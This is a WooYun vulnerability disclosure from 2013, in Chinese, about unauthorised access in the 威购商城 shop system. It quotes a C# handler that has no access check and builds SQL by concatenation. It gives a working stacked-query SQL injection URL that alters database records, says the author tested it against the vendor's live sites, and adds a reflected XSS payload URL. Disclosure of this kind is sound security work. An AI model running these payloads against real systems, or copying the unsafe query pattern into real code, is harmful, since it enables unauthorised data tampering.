当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046179

漏洞标题:威购商城管理系统任意修改数据漏洞

相关厂商:威购商城管理系统

漏洞作者: Damo

提交时间:2013-12-19 17:27

修复时间:2014-03-19 17:27

公开时间:2014-03-19 17:27

漏洞类型:非授权访问/权限绕过

危害等级:中

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-03-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看到各位大牛都在找通用通用 通用 小弟也到站长之家下载一些程序本地研究一下

详细说明:

其他下载点不统计 只统计站长

1.png


首先本地测试一下
问题出现在
WebService\ShopService.ashx
代码如下

/// <summary>
    /// 删除规格值
    /// </summary>
    /// <param name="context"></param>
    public void DeleteSpec(HttpContext context)
    {
        if (conn.Execute("delete HLshop_spec_value where sp_value_id=" + context.Request.Params["spvalueid"]) > 0) //由于此处没有进行访问验证以及代码过滤导致
        {
            context.Response.Write("1");
        }
        else
        {
            context.Response.Write("0");
        }
    }


本地测试结果

http://192.168.1.118:8886/WebService%5CShopService.ashx?Action=DeleteSpec&spvalueid=10000;update%20HLShop_Class%20set%20ClassName=%27WooYun%27%20where%20ClassID=225


结果如下

2.png


漏洞证明:

对其官方商城测试
http://www.0518vip.com
http://test.vgoshop.com
http://demo.vgoshop.com
结果如下

3.png

5.png

41.png


一处XSS

http://192.168.1.118:8886/ProductList.aspx?classid=148&city=%3Cscript%3Ealert%28/WooYun/%29%3C/script%3E


6.png


修复方案:

文件的权限 以及访问参数的过滤

版权声明:转载请注明来源 Damo@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝